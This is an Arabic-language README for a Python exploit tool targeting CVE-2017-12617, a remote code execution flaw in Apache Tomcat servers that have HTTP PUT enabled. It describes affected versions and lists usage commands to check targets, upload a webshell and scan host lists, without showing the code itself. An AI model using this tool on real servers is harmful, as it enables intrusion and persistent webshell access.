
استغلال Python لـ CVE-2017-12617، وهي ثغرة RCE حرجة في Apache Tomcat مع تمكين HTTP PUTs. يتحقق من قابلية الهدف للاستغلال، ويقوم بتحميل قذائف الويب، ويفحص قوائم المضيفين.
ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) مكتشفة في Apache Tomcat
تؤثر على الأنظمة التي يتم فيها تمكين HTTP PUTs (عبر ضبط مُعامل التهيئة "read-only" لـ Default servlet على "false").
إصدارات Tomcat قبل 9.0.1 (Beta)، 8.5.23، 8.0.47 و 7.0.82 تحتوي على ثغرة خطيرة محتملة
لتنفيذ الأوامر عن بُعد (RCE) على جميع أنظمة التشغيل إذا تم تكوين Default servlet
مع ضبط المُعامل readonly على false أو تم تمكين WebDAV servlet
مع ضبط المُعامل readonly على false
./cve-2017-12617.py [options]
الخيارات:
-u ,--url [::] فحص عنوان الهدف لمعرفة ما إذا كان ضعيفًا
-p,--pwn [::] إنشاء webshell ورفعه
-l,--list [::] قائمة بالمضيفين
[+]الاستخدام:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt